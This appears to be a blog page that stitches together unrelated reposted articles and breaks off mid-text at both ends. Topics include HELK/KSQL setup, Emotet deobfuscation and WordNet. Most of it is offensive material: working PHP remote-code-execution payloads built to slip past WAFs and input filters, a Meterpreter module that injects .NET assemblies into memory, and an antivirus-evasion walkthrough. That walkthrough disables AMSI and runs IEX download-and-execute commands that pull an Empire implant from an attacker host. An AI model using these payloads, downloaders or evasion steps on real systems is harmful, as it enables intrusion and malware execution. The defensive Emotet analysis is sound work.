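Only the first network connection is emitted, because no ProcessCreate event with the second ProcessGUID was seen; the joined record now carries the command line alongside the destination address.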

HELK and KSQL Integration

KSQL was developed as part of the Confluent platform, and it can be distributed via docker images available on DockerHub. HELK is deployed via docker images as a proof of concept, so having docker images for KSQL works perfectly. The two docker images that I added to the HELK ecosystem are the following ones:

  • Cp-ksql-server Image: It includes the ksql-server package which runs the engine that executes KSQL queries.
  • Cp-ksql-cli Image: It includes the ksql-cli package, which acts as a client to the KSQL server and allows researchers to interactively pass KSQL queries to it. This one is added to the HELK just for testing purposes. The KSQL server can run independently with predefined SQL query files.

For this blog post, we will need the following:

  • An Ubuntu box hosting the latest HELK build
  • A Windows 10 System with Sysmon installed
  • Winlogbeat installed on the Windows 10 and shipping logs to HELK

Deploying KSQL via HELK

Clone the HELK to your Ubuntu box, and change your directory to docker as shown below:

git clone https://github.com/Cyb3rWard0g/HELK.git
cd HELK/docker

Run the helk_install.sh script to install and run the HELK docker images. You can just go with all the default options and run the basic HELK deployment which comes with both KSQL server and KSQL CLI containers.

sudo ./helk_install.sh

If you want to monitor your HELK installation, you can open another console, and run the following commands:

tail -f /var/log/helk-install.log

Once the installation finishes, you should see the following on your main screen:

Run the following commands to see if your containers are running:

sudo docker ps

Launch KSQL CLI interface

You are now ready to start using KSQL. We will use KSQL via its command line interface (CLI) to connect to the helk-ksql-server container and send KSQL queries to it. Run the following command to access the helk-ksql-cli container and establish a connection to the helk-ksql-server container:

sudo docker exec -ti helk-ksql-cli ksql http://helk-ksql-server:8088

A KSQL CLI banner will show up, and you will be able to use the KSQL CLI.

Inspect the KSQL Server Properties

You can now start by checking the properties assigned to the KSQL server by running the following commands:


The information above confirms that the helk-kafka-broker is part of the ksql.streams.bootstrap.servers. Therefore, we will be able to execute KSQL queries on the topics available in the Kafka broker.

Check Available Kafka Topics

We can check the metadata of topics available on our helk-kafka-broker with the SHOW TOPICS command.


What the HELK is going on so far?

Up to this point, we have all we need to start using KSQL on the top of the HELK project. The following is happening:

  • HELK’s Kafka broker is running with the topic winlogbeat
  • KSQL Server is running and configured to read from the Kafka topic named winlogbeat
  • KSQL CLI is running and configured to talk to KSQL Server and send interactive queries
  • Your Ubuntu box hosting the HELK has an interactive connection to the helk-ksql-cli container
  • HELK is waiting for Windows Sysmon logs to be published

Get Sysmon Data to HELK

You can now install Sysmon and Winlogbeat following the initial instructions in this post. The following binary versions and configurations are recommended:

Sysmon V8.04

Winlogbeat V6.5.3

Remember to start the winlogbeat service to start sending logs to the HELK Kafka broker as shown in the image below:

Check Winlogbeat Shipping Logs

You can check if the logs being collected by the Winlogbeat Shipper are being published to your HELK Kafka broker by running the following command on your Windows endpoint:

winlogbeat.exe -e

Check Logs Published to Kafka Topics

You can also inspect messages making it to the Kafka topic winlogbeat with the PRINT command as shown below:

ksql> PRINT 'winlogbeat';

We can confirm that data is flowing from our Windows system to our HELK Kafka broker, and through our KSQL Server.

I hope this first post helped you get familiar with the basic concepts of KSQL, and showed you how easy it is to use with the latest version of HELK. In the next post, I will show you how to use KSQL to start joining Sysmon events 1 and 3 in real time. The Sysmon-Join KSQL Recipe will be shared for you to try.



How To Exploit PHP Remotely To Bypass Filters & WAF Rules

( Original text by Andrea Menin )

In the last three articles, I focused on how to bypass a WAF rule set in order to exploit a remote command execution. In this article, I’ll show you how many possibilities PHP gives us to exploit a remote code execution while bypassing filters, input sanitization, and WAF rules. Usually when I write articles like this one, people (typically not pentesters) ask “do people really write code like this?” Let me answer before you ask me again: YES and YES.

This is the first of two vulnerable PHP scripts that I’m going to use for all tests. This script is definitely too easy and dumb, but it’s just meant to reproduce a remote code execution scenario (in a real scenario, you’ll probably have to do a little more work to reach this situation):

first PHP script

Obviously, the sixth line is pure evil. The third line tries to intercept functions like system, exec, or passthru (there are many other functions in PHP that can execute system commands, but let’s focus on these three). This script is running on a web server behind the CloudFlare WAF (as always, I’m using CloudFlare because it’s easy and widely known; this doesn’t mean that the CloudFlare WAF is not secure. All other WAFs have the same issues, more or less…). The second script will be behind ModSecurity + OWASP CRS3.

Trying to read /etc/passwd

For the first test, I try to read /etc/passwd using the system() function with the request /cfwaf.php?code=system("cat /etc/passwd");

CloudFlare WAF blocks my first try

As you can see, CloudFlare blocks my request (maybe because of the “/etc/passwd” string) but, if you have read my last article about uninitialized variables, you know I can easily bypass it with something like cat /etc$u/passwd

CloudFlare WAF bypassed but input sanitization blocks the request

The CloudFlare WAF has been bypassed, but the check on the user’s input blocked my request because I’m trying to use the “system” function. Is there a syntax that lets me use the system function without using the “system” string? Let’s take a look at the PHP documentation about strings!

PHP String escape sequences

\[0-7]{1,3} sequence of characters in octal notation, which silently overflows to fit in a byte (e.g. "\400" === "\000")

\x[0-9A-Fa-f]{1,2} sequence of characters in hexadecimal notation (e.g. "\x41")

\u{[0-9A-Fa-f]+} sequence of Unicode codepoint, which will be output to the string as that codepoint’s UTF-8 representation (added in PHP 7.0.0)

Not everyone knows that PHP has a lot of syntaxes for representing a string, and with the “PHP Variable functions” it becomes our Swiss Army knife for bypassing filters and rules.
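To make the three escape notations concrete, here is a minimal Python sketch that rewrites a function name into each of the PHP double-quoted forms listed above. The helper names (php_hex_escape, php_octal_escape, php_unicode_escape) are hypothetical and exist only for illustration; the sketch only builds strings and assumes an ASCII function name.

```python
def php_hex_escape(name):
    """Return name as a PHP double-quoted string made of \\xHH escapes."""
    return '"' + "".join(f"\\x{b:02x}" for b in name.encode("ascii")) + '"'


def php_octal_escape(name):
    """Return name as a PHP double-quoted string made of 3-digit octal escapes."""
    return '"' + "".join(f"\\{b:03o}" for b in name.encode("ascii")) + '"'


def php_unicode_escape(name):
    """Return name as a PHP double-quoted string made of \\u{...} escapes (PHP 7.0.0+)."""
    return '"' + "".join(f"\\u{{{ord(c):x}}}" for c in name) + '"'


if __name__ == "__main__":
    for encode in (php_hex_escape, php_octal_escape, php_unicode_escape):
        print(encode("system"))
```

Each printed string evaluates to “system” inside a PHP double-quoted string without the literal word ever appearing in the request.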

PHP Variable functions

PHP supports the concept of variable functions. This means that if a variable name has parentheses appended to it, PHP will look for a function with the same name as whatever the variable evaluates to, and will attempt to execute it. Among other things, this can be used to implement callbacks, function tables, and so forth.

This means that syntaxes like $var(args); and “string”(args); are equal to function(args);. If I can call a function by using a variable or a string, it means that I can use an escape sequence instead of the name of a function. Here is an example:

The third syntax is a sequence of characters in hexadecimal notation that PHP converts to the string “system”, which is then resolved to the function system and called with the argument “ls”. Let’s try with our vulnerable script:

user input sanitization bypassed

This technique doesn’t work for all PHP functions: variable functions won’t work with language constructs such as echo, print, unset(), isset(), empty(), include, require and the like. Utilize wrapper functions to make use of any of these constructs as variable functions.

Improve the user input sanitization

What happens if I exclude characters like double and single quotes from the user input on the vulnerable script? Is it possible to bypass it even without using double quotes? Let’s try:

prevent using “ and ‘ on $_GET[code]

As you can see on the third line, the script now prevents the use of “ and ‘ inside the $_GET[code] querystring parameter. My previous payload should be blocked now:

Now my vulnerable script prevents using “

Luckily, in PHP, we don’t always need quotes to represent a string. PHP lets you declare the type of an element, as in $a = (string)foo; in this case, $a contains the string “foo”. Moreover, whatever is inside round brackets without a specific type declaration is treated as a string:

In this case, we have two ways to bypass the new filter. The first one is to use something like (system)(ls); but we can’t use “system” inside the code parameter, so we can concatenate strings like (sy.(st).em)(ls);. The second one is to use the $_GET variable. If I send a request like ?a=system&b=ls&code=$_GET[a]($_GET[b]); then $_GET[a] will be replaced with the string “system”, $_GET[b] will be replaced with the string “ls”, and I’ll be able to bypass all filters!

Let’s try with the first payload (sy.(st).em)(whoami);

WAF bypassed, filter bypassed

and the second payload ?a=system&b=cat+/etc&c=/passwd&code=$_GET[a]($_GET[b].$_GET[c]);

WAF bypassed, filter bypassed

In this case it is not useful, but you can even insert comments inside the function name and inside the arguments (this could be useful in order to bypass a WAF rule set that blocks specific PHP function names). All following syntaxes are valid:


The PHP function get_defined_functions returns a multidimensional array containing a list of all defined functions, both built-in (internal) and user-defined. The internal functions will be accessible via $arr["internal"], and the user-defined ones using $arr["user"]. For example:

This could be another way to reach the system function without using its name. If I grep for “system” I can discover its index number and use it as a string for my code execution:

1077 = system

Obviously, this should work against our CloudFlare WAF and script filters:

bypass using get_defined_functions

Array of characters

Each string in PHP can be used as an array of characters (almost like Python does) and you can refer to a single string character with the syntax $string[2] or $string[-3]. This could be another way to elude rules that block PHP function names. For example, with this string $a="elmsty/ "; I can compose the syntax system("ls /tmp");
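The index arithmetic is easy to get wrong by hand, so here is a small Python sketch that computes the PHP index expression for a target word from a given alphabet string. The helper name php_index_expr is hypothetical. It raises an error when a character is missing from the alphabet, which is worth checking: the string "elmsty/ " contains no 'p', so "ls /tmp" cannot be built from it without one extra character.

```python
def php_index_expr(alphabet, target, var="$a"):
    """Build a PHP expression like $a[3].$a[5] that spells target from alphabet."""
    parts = []
    for ch in target:
        idx = alphabet.find(ch)
        if idx < 0:
            raise ValueError(f"character {ch!r} is not available in {alphabet!r}")
        parts.append(f"{var}[{idx}]")
    return ".".join(parts)


if __name__ == "__main__":
    alphabet = "elmsty/ "
    # Function name and a simple argument, both spelled from the alphabet.
    print("(" + php_index_expr(alphabet, "system") + ")("
          + php_index_expr(alphabet, "ls /") + ");")
```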

If you’re lucky you can find all the characters you need inside the script filename. With the same technique, you can pick all chars you need with something like (__FILE__)[2]:


Let me say that with the OWASP CRS3 everything becomes harder. First, with the techniques seen before I can bypass only the first paranoia level, and this is amazing! Paranoia Level 1 is just a small subset of the rules available in CRS3, and this level is designed to prevent any kind of false positive. With Paranoia Level 2 things become hard because of rule 942430 “Restricted SQL Character Anomaly Detection (args): # of special characters exceeded”. All I can do is execute a single command without arguments like “ls”, “whoami”, etc., but I can’t execute something like system("cat /etc/passwd") as done with the CloudFlare WAF:

Previous Episodes

Web Application Firewall Evasion Techniques #1

Web Application Firewall Evasion Techniques #2

Web Application Firewall Evasion Techniques #3

Deobfuscating Emotet’s powershell payload

( Original text by malfind )

Emotet is a banking trojan, targeting computer users since around 2014. During that time it has changed its structure a lot. Lately we see massive emotet spam campaigns, using multiple phishing methods to bait users to download and launch a malicious payload, usually in the form of a weaponized Word document.

Emotet’s chain of infection

First, the user receives a fake e-mail that tries to persuade them to click a link, from which the weaponized doc is downloaded. The document then tries to trick the user into enabling content and allowing macros in order to launch the embedded VBA code. The VBA is obfuscated. We could deobfuscate it too, but in the end it just launches a powershell command. Let’s skip VBA deobfuscation today, as I want to focus on powershell. We can obtain the powershell command launched by the VBA code without deobfuscation by using any sandbox with powershell auditing.

Typical Emotet document

The powershell code itself is obfuscated as well. The problem with just launching it in the virtual environment is that we probably won’t see every network IoC this way. Of course there are ways to do it (just block dns requests, and malware should try every fail-over domain), but in my opinion if there is time to do it – it is always better to deobfuscate code to better understand it.

Obfuscation is a way to make malicious code unreadable. It has two purposes: first, to evade antivirus signatures; second, to make analysis of the code harder and more time-consuming.

In this post, I want to show three ways of obfuscation used by Emotet malware since December 2017.

1. String replace method

This method uses multiple powershell “replace” operators to swap a bunch of junk strings with characters that in the end produce valid powershell code.

Example 1. Code obfuscated with replace string method

Of course you can deobfuscate it manually in any text editor, just by replacing every string with its equivalent, or you can speed up the process with the right regular expression. In the end you can put this regular expression in a python script and automate it completely. There are just a few things to consider when implementing it in python:

  • String concatenations. These little ‘+’ signs can mess up our regexp, so they have to be handled first
  • Char type projection: sometimes, for additional obfuscation, the strings to be replaced are not typed directly into the powershell code but are converted from int to char. We have to handle that as well
  • Replacing one part of the code can “generate” new replace operators. This happens because a “junk string” can sit in the middle of a replace operator (for example: -replFgJace, where FgJ is a string to be replaced with an empty string). For this reason it is best to put the regexp in a loop and keep replacing as long as there is something to replace

Deobfuscated code from example 1
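The loop described in the last point can be sketched in a few lines of Python. This is a simplified illustration under stated assumptions, not the script referenced later in the post: it assumes single-quoted operands, treats every junk string as a literal (powershell's -replace is really regex-based), joins 'a'+'b' concatenations first, and does not handle [char] casts. The names REPLACE_OP, CONCAT and apply_replaces are hypothetical, and the sample input is made up.

```python
import re

# Matches: -replace 'junk','real'  (also -creplace), single-quoted operands only.
REPLACE_OP = re.compile(r"-c?replace\s*'([^']+)'\s*,\s*'([^']*)'", re.IGNORECASE)
# Matches the seam of a concatenation such as 'ab'+'cd'.
CONCAT = re.compile(r"'\s*\+\s*'")


def apply_replaces(code, max_rounds=50):
    """Repeatedly apply visible replace operators until none are left."""
    code = CONCAT.sub("", code)  # handle string concatenations first
    for _ in range(max_rounds):
        ops = REPLACE_OP.findall(code)
        if not ops:
            break
        code = REPLACE_OP.sub("", code)  # drop the operators we are about to apply
        for junk, real in ops:
            # Removing junk may reveal operators that were hidden, e.g. -replFgJace.
            code = code.replace(junk, real)
    return code


if __name__ == "__main__":
    sample = "('WFg'+'Jrite-Host hZqi' -replFgJace 'Zq','') -replace 'FgJ',''"
    print(apply_replaces(sample))
```

In the sample, the inner operator only becomes visible after the outer one has removed FgJ, which is why a single pass is not enough.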

2. String compression

This method is quite simple as it uses powershell’s built-in class DeflateStream to decompress and execute a compressed stream.

Example 2. Decompress string obfuscation method

The easiest way to deobfuscate this is to use powershell to simply decompress the string. Just remember to remove the command between the first two parentheses: it is an obfuscated Invoke-Expression cmdlet that will execute the code on your computer! Also, always use a safe, virtualized environment (preferably disconnected from the network, unless you know what you are doing) when dealing with malicious code.

Decompression method deobfuscation in powershell

But what if we’d like to have a portable python script that can deal with this type of deobfuscation? If we look at the MSDN documentation, we will see that the DeflateStream class follows the RFC 1951 Deflate data format specification, so its output can actually be decompressed with the zlib library. There is one catch: zlib’s decompress method by default expects a correct zlib header, which DeflateStream output does not have, as it is not a file but a raw stream. To force zlib to decompress such a stream we can either add a header to it or simply pass -zlib.MAX_WBITS (there is a minus at the beginning!) as the wbits argument of the decompress function. zlib.MAX_WBITS is 15, and a negative value tells decompress to treat the input as a raw deflate stream with no header.
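A minimal sketch of that zlib call is shown below. It assumes the compressed blob is carried as a Base64 string, which the text above does not state, so adjust the decoding step to whatever the sample actually uses. The helper names inflate_raw and deflate_raw are hypothetical; deflate_raw exists only to produce a harmless test input.

```python
import base64
import zlib


def inflate_raw(b64_payload):
    """Decode Base64 (an assumption) and inflate a headerless RFC 1951 stream."""
    raw = base64.b64decode(b64_payload)
    # Negative wbits: raw deflate data, no zlib header or checksum expected.
    return zlib.decompress(raw, -zlib.MAX_WBITS).decode("utf-8", errors="replace")


def deflate_raw(text):
    """Build a headerless deflate stream, mimicking what DeflateStream emits."""
    compressor = zlib.compressobj(wbits=-zlib.MAX_WBITS)
    raw = compressor.compress(text.encode("utf-8")) + compressor.flush()
    return base64.b64encode(raw).decode("ascii")


if __name__ == "__main__":
    sample = deflate_raw("Write-Host 'harmless test string'")
    print(inflate_raw(sample))
```

Calling zlib.decompress on the same bytes without the negative wbits argument fails with a header error, which is the catch described above.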

3. ASCII codes array

How does the computer represent strings? Well, that is simple: as numbers. But numbers are much harder for a human to read than strings, so programs convert these numbers back to strings for display. And if the goal of obfuscation is to make code harder to read, then why not use this trick to hide the true purpose of malicious code? This is the third obfuscation method I will present.

Example 3. Ascii code array obfuscation method

In the example above we can see a long string with a lot of numbers in it. If you are familiar with ASCII codes, you will probably recognize them instantly. If not, then your hint should be the type projection after the pipe, which converts every given string from the table first to int and then to char. The method presented in example 3 also uses a split operator, which splits a string by a given separator, to further obfuscate the code. I have also seen samples where a pure char array is used instead of a string that has to be split.

To deobfuscate this in python, simply use a similar split method (found in the re library), and then map the numbers to chars with the chr() function.

Ascii array with split method deobfuscation in python
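A minimal sketch of the split-and-chr approach, assuming the separators are single characters and the codes are decimal. The helper name decode_char_codes and the sample input are hypothetical.

```python
import re


def decode_char_codes(blob, separators):
    """Split blob on any separator character and map each decimal code to a char."""
    pattern = "[" + re.escape(separators) + "]"
    tokens = re.split(pattern, blob)
    # Skip empty tokens produced by leading, trailing or doubled separators.
    return "".join(chr(int(tok)) for tok in tokens if tok.strip())


if __name__ == "__main__":
    # Made-up input: codes 105, 101, 120 separated by the characters Z and t.
    print(decode_char_codes("105Z101t120", "Zt"))
```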

A little more about the code

So now that we have deobfuscated the code, what can we gain from it? We can clearly see that this is a simple dropper that uses the WebClient class to connect to hardcoded domains, download a binary to the %TEMP% directory, and then launch it. The break instruction combined with the try-catch clause ensures that the script keeps trying the listed domains until a download completes successfully. So if it gets a binary from the first domain on the list, we will never see the others in dynamic analysis. This is why deobfuscation is important.


Many obfuscated powershell scripts (not only from Emotet) use the Invoke-Expression cmdlet to run an obfuscated string as code. This is very important when we are working with malicious powershell code in the windows console, because a missed Invoke-Expression cmdlet will launch the code instead of just displaying it. Therefore it is always important to look for disguised Invoke-Expression cmdlets. Why disguised? Because they are not always easy to spot. Firstly, powershell allows aliases for long commands; for example, the built-in alias for Invoke-Expression is “iex”. But this is not the end! Powershell also allows strings to be concatenated and used as cmdlets, and strings can be stored in variables. You see the problem?

Let’s return to the example with DeflateStream compression. There is the following line at the beginning of the script:


It takes the value of powershell’s built-in variable $verbosepreference, converts it to a string, takes the 2nd and 4th chars, adds ‘X’, and joins them all into one string using the join operator.

What is the default value of $verbosepreference? It turns out it is ‘SilentlyContinue’. The second and fourth chars of this string are, you guessed it, ‘i’ and ‘e’. When we concatenate them with ‘x’ we receive ‘iex’, the alias of the Invoke-Expression cmdlet. Creepy? Kinda. These kinds of tricks are very popular among malware developers working with powershell.
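The character arithmetic can be checked quickly in Python. This only reproduces the indexing described above (zero-based positions 1 and 3 are the 2nd and 4th chars); the helper name build_alias is hypothetical.

```python
def build_alias(value, positions, suffix):
    """Pick characters of value at the given zero-based positions, then append suffix."""
    return "".join(value[i] for i in positions) + suffix


if __name__ == "__main__":
    # Default value of $verbosepreference, as stated in the text.
    print(build_alias("SilentlyContinue", (1, 3), "x"))
```

When triaging a sample, evaluating such fragments outside of powershell is a safe way to see what command name they resolve to.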

Invoke-Expression obfuscation example

Homework: Can you spot an Invoke-Expression cmdlet in third example (ASCII table)?

Deobfuscation script for Emotet

I put my deobfuscation script for Emotet on GitHub. You can use it and modify it as you wish. For now it automatically detects and deobfuscates all obfuscation methods described in this post.


Execute assembly via Meterpreter session

( Original text by B4rtik )


To run a PE file, Windows relies on reading its header. The PE header describes how the file should be loaded in memory, which dependencies it has, and where the entry point is.
And what about a .NET assembly? The entry point is somewhere in the IL code. Directly executing the assembly from an entry point in the intermediate code would cause an error.
This is because the intermediate code cannot be executed directly: the runtime has to be started first, and it then loads the intermediate code and executes it.

Hosting CLR

In previous versions of Windows, execution is passed to an entry point where the boot code is located. The startup code is native code that uses the unmanaged CLR API to start the .NET runtime within the current process and launch the real program, which is the IL code. This could be a good strategy to achieve the result. The final aim is to run the assembly directly in memory, so the DLL needs the assembly somewhere in memory, any command-line parameters, and a reference to the memory area that contains them.

Execute Assembly

So I need to create a post-exploitation module that performs the following steps:

  1. Spawn a process to host CLR (meterpreter)
  2. Reflectively Load HostCLR dll (meterpreter)
  3. Copy the assembly into the spawned process memory area (meterpreter)
  4. Copy the parameters into the spawned process memory area (meterpreter)
  5. Read assembly and parameters (dll)
  6. Execute the assembly (dll)

To start the Host process, Metasploit provides Process.execute, which has the following signature:

Process.execute (path, arguments = nil, opts = nil)

The interesting part is the opts parameter:

  1. Hidden
  2. Channelized
  3. Suspended
  4. InMemory

By setting Channelized to true, I can read the assembly output for free with the call


Once the Host process is created, Metasploit provides some functions for interacting with the memory of a remote process:

  1. inject_dll_into_process
  2. memory.allocate
  3. memory.write

The inject_dll_into_process function copies the binary passed as an argument to a read-write-exec memory area and returns its address and the offset of the DLL’s entry point.

exploit_mem, offset = inject_dll_into_process (process, library_path)

The memory.allocate function allocates memory with the requested protection mode. In this case I will write the parameters and the assembly to the allocated memory area. Neither of these two elements needs the memory to be executable, so I will set RW.

I decided to organize the memory area dedicated to parameters and assemblies as follows:

1024 bytes for the parameters
1M for the assembly

assembly_mem = process.memory.allocate (1025024, PAGE_READWRITE)

The third method writes data to a specified memory address.

process.memory.write (assembly_mem, params + File.read (exe_path))
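The layout arithmetic behind the 1025024-byte allocation can be sketched as follows. This is only an illustration in Python, not the module's code: it reads "1M" as 1024000 bytes so that the two regions add up to the allocated size, and it assumes the parameter block is padded with NUL bytes to its fixed width so the assembly always starts at offset 1024. The names PARAMS_SIZE, ASSEMBLY_SIZE and build_buffer are hypothetical.

```python
PARAMS_SIZE = 1024            # fixed-width region for the command-line parameters
ASSEMBLY_SIZE = 1024 * 1000   # "1M" region for the assembly; 1024 + 1024000 == 1025024


def build_buffer(arguments, assembly):
    """Return parameters padded to PARAMS_SIZE (assumed NUL padding) plus the assembly."""
    params = arguments.encode("ascii")
    if len(params) >= PARAMS_SIZE:
        raise ValueError("parameters do not fit in the parameter region")
    if len(assembly) > ASSEMBLY_SIZE:
        raise ValueError("assembly does not fit in the assembly region")
    return params.ljust(PARAMS_SIZE, b"\x00") + assembly


if __name__ == "__main__":
    buf = build_buffer("antani sblinda destra", b"MZ" + b"\x00" * 62)
    print(len(buf), PARAMS_SIZE + ASSEMBLY_SIZE)
```

A fixed-width parameter region keeps the reading side simple: the DLL can find the assembly at a constant offset from the pointer it receives.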

Now I have the memory address of the DLL, the offset to the entry point, and the memory address of both the parameters and the assembly to be executed.
Considering the function

Thread.create (entry, parameter = nil, suspended = false)

I can use the memory address of the DLL plus the offset as the value of the entry parameter, and the address of the parameter and assembly memory area as the value of the parameter argument.

process.thread.create (exploit_mem + offset, assembly_mem)

This results in a call to the entry point and an LPVOID pointer as input parameter.

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)

It’s all I need to recover the parameters to be passed to the assembly and the assembly itself.

ReadProcessMemory(GetCurrentProcess(), lpPayload, allData, RAW_ASSEMBLY_LENGTH + RAW_AGRS_LENGTH, &readed);

About the assemblies to be executed, it is important to note that the signature of the Main method must match with the parameters that have been set in the module, for example:

If the property ARGUMENTS is set to «antani sblinda destra» the Main method should be «static void Main(string[] args)»
If the property ARGUMENTS is set to «» the Main method should be «static void Main()»

Chaining with SharpGen

A few days ago I read a blog post from @cobb_io where he presented an interesting tool for inline compilation of .NET assemblies. By default the execute-assembly module looks for assemblies in $(metasploit-framework-home)/data/execute-assembly, but this behavior can be changed by setting the ASSEMBLYPATH property, for example by pointing it to the SharpGen Output folder. This way I can compile the assemblies and execute them directly with the module.

Source code


Bypassing Kaspersky Endpoint Security 11

( Original text by 0xc0ffee )


During a recent engagement, I was given a Windows tablet with no (pentest) tools installed and was asked to test its security and see how far I could go by compromising it. I had my own laptop but I was not allowed to directly connect to the internal network with it. However, I could use it as a C2 if I were to successfully compromise the tablet. Long story short, obtaining the initial shell was more difficult than owning the network due to the antivirus(es) that I had to bypass.


  1. Fully patched Windows 10 running on the tablet
  2. Up-to-date Kaspersky Endpoint Security 11 (KES11) on the tablet
  3. Google Chrome running in kiosk/PoS mode on the tablet
  4. Powershell Empire listener on the C2


So, I’m in Chrome’s kiosk/PoS mode on the tablet and every Windows shortcut is blocked such as WIN+R, ALT+TAB, CTRL+P, ALT+SPACE, etc. More on that here: Kiosk/POS Breakout Keys in Windows

However, the CTRL+N shortcut to open a new page was not blocked, bingo! We got a new page and Internet access, awesome. I went to the URL bar and quickly used the file:// scheme to download and open cmd.exe:

Instead of rushing straight into the terminal that just popped, I tried to open the Windows Explorer to have GUI access to files and shares by clicking Open file location on the downloaded file. Aaaaand, the action was denied, probably by a GPO.

Back to the terminal:

  1. I enumerated the files and shares and found nothing interesting.
  2. Ran wmic product get name, version to enumerate the installed software and associated versions.
  3. Ran wmic qfe get to list the hotfixes.
  4. Ran net user my_user /domain (yes, my_user was domain-joined to simulate an internal attack)
  5. Ran whoami /priv to list my privileges.

I got nothing very interesting exploit-wise that would give me a quick win. I was a domain-joined user with no administrative privileges and had many restrictive GPOs applied to the groups I belonged to. AV-wise, Kaspersky Endpoint Security was installed and so was Windows Defender.

Fail, fail, fail and succeed

One of my goals was to prove I could bypass the AV by injecting an Empire implant and moving on from there. As this test was not a red team engagement and was time-constrained, I did not replicate the tablet’s environment to perform my tests. So, I started by downloading the Empire Powershell launcher through an encrypted channel with Powershell’s Invoke-Expression: IEX (New-Object Net.Webclient).downloadstring("https://EVIL/hello_there") and that would get detected, not by the AV, but by the firewall that was presumably performing SSL inspection! So, I needed a payload that could at least get through the firewall before getting executed in memory. To spare you some time, I spent a full day failing over and over, getting detected either by the firewall or by the AV, making the sysadmins very happy but also tired of getting alerts.

Compression and memory patching make a good pair

I knew Windows Defender was installed on the tablet and was letting KES11 take control of most of the anti-malware scanning. However, I learned the hard way that KES11 was making use of AMSI’s detection of script-based attacks. In fact, on their website, they mention the use of the AMSI technology, but only on the Kaspersky Security for Windows Server page:

Support for AMSI interfaces. Use of AMSI technology, which is integrated in Microsoft Windows, has enabled the improvement of the mechanism for intercepting script launches on the server. The stability of the Script Monitoring task is improved, the application’s influence on the environment is reduced when intercepting scripts and blocking them if threats are detected, and the task scope is significantly expanded – now the Script Monitoring component works not only with scripts in JS and VBS files, but also PS1 files. The functionality is available when the Script Monitoring component is installed on servers running Microsoft Windows Server 2016 or newer.

A colleague of mine recently shared an excellent blog post on how to bypass/disable the Anti Malware Scan Interface (AMSI) without elevated privileges by patching it in memory with a DLL : Bypass AMSI and Execute ANY malicious powershell code

With that in mind, we first need to bypass traffic inspection, remember? Invoke-Obfuscation comes to the rescue. Compressing the Empire payload a few times was enough to get around it.

First, we grab the base64 part of our launcher.bat file generated by Empire, decode it and send it over to Invoke-Obfuscation. To do so, we run set SCRIPTBLOCK our_empire_base64decoded_payload:

Next, we run COMPRESS\1 a couple of times to compress our payload:

I then successfully downloaded the file to load it in memory with IEX. But now that the traffic inspection was bypassed, the AV was blocking the execution of the payload (no surprise).

What I learned during this gig was that KES11’s heuristics or signature-based detections were firing on my payload before AMSI even had a chance to inspect the script. I had to compress the payload exactly 4 times before it could bypass the AV and then get detected by AMSI:

All that’s left to do is disable AMSI and we’re good to go. I hosted the following code on a web server and downloaded it on the tablet with IEX:

function Bypass-AMSI
    if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMSI").Type) {
        Write-Output "DLL has been reflected";

Source: Bypass AMSI and Execute ANY malicious powershell code

IEX (New-Object Net.Webclient).downloadstring("https://EVIL/amsi") then Bypass-AMSI.

Successful execution

Now that the payload is compressed 4 times and AMSI is disabled, we download the payload and execute it in memory:

IEX (New-Object Net.Webclient).downloadstring("https://EVIL/compressed4.txt")

In the screenshot above, we can see that compressing the payload up to 3 times gets detected by KES11. The 4th time, the payload gets through the AV and since AMSI is disabled, we get successful execution:


Natural Language Processing: Measuring Semantic Relatedness

( Original text by Sandipan )

Long title: Measuring Semantic Relatedness using the Distance and the Shortest Common Ancestor and Outcast Detection with Wordnet Digraph in Python

The following problem appeared as an assignment in the Algorithm Course (COS 226) at Princeton University taught by Prof. Sedgewick. The description of the problem is taken from the assignment itself. However, while the assignment calls for an implementation in Java, this article describes a Python implementation instead. Instead of using nltk, this implementation is written from scratch.

The Problem

  • WordNet is a semantic lexicon for the English language that computational linguists and cognitive scientists use extensively. For example, WordNet was a key component in IBM’s Jeopardy-playing Watson computer system.
  • WordNet groups words into sets of synonyms called synsets. For example, { AND circuit, AND gate } is a synset that represents a logical gate that fires only when all of its inputs fire.
  • WordNet also describes semantic relationships between synsets. One such relationship is the is-a relationship, which connects a hyponym (more specific synset) to a hypernym (more general synset). For example, the synset { gate, logic gate } is a hypernym of { AND circuit, AND gate } because an AND gate is a kind of logic gate.
  • The WordNet digraph. The first task is to build the WordNet digraph: each vertex v is an integer that represents a synset, and each directed edge v→w represents that w is a hypernym of v.
  • The WordNet digraph is a rooted DAG: it is acyclic and has one vertex—the root— that is an ancestor of every other vertex.
  • However, it is not necessarily a tree because a synset can have more than one hypernym. A small subgraph of the WordNet digraph appears below.

The WordNet input file formats

The following two data files will be used to create the WordNet digraph. The files are in comma-separated values (CSV) format: each line contains a sequence of fields, separated by commas.

  • List of synsets: The file synsets.txt contains all noun synsets in WordNet, one per line. Line i of the file (counting from 0) contains the information for synset i.
    • The first field is the synset id, which is always the integer i;
    • the second field is the synonym set (or synset); and
    • the third field is its dictionary definition (or gloss), which is not relevant to this assignment. For example, line 36 means that the synset { AND_circuit, AND_gate } has an id number of 36 and its gloss is a circuit in a computer that fires only when all of its inputs fire. The individual nouns that constitute a synset are separated by spaces. If a noun contains more than one word, the underscore character connects the words (and not the space character).
  • List of hypernyms: The file hypernyms.txt contains the hypernym relationships. Line i of the file (counting from 0) contains the hypernyms of synset i.
    • The first field is the synset id, which is always the integer i;
    • subsequent fields are the id numbers of the synset’s hypernyms. For example, line 36 means that synset 36 (AND_circuit AND_gate) has 42338 (gate logic_gate) as its only hypernym. Line 34 means that synset 34 (AIDS acquired_immune_deficiency_syndrome) has two hypernyms: 47569 (immunodeficiency) and 56099 (infectious_disease).
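As a rough sketch of how the two file formats could be read, the functions below parse the text of each file into plain dictionaries. The function names and the sample lines are hypothetical; in particular the gloss used for synset 34 is a placeholder, chosen only to show that a gloss may itself contain commas.

```python
def parse_synsets(text):
    """Return (synset id -> list of nouns, noun -> set of synset ids)."""
    nouns_by_id = {}
    ids_by_noun = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        # Split on the first two commas only: the gloss may contain commas.
        synset_id, synset, _gloss = line.split(",", 2)
        nouns = synset.split()
        nouns_by_id[int(synset_id)] = nouns
        for noun in nouns:
            ids_by_noun.setdefault(noun, set()).add(int(synset_id))
    return nouns_by_id, ids_by_noun


def parse_hypernyms(text):
    """Return adjacency lists: synset id -> list of hypernym ids (edges v -> w)."""
    edges = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(",")
        edges[int(fields[0])] = [int(f) for f in fields[1:]]
    return edges


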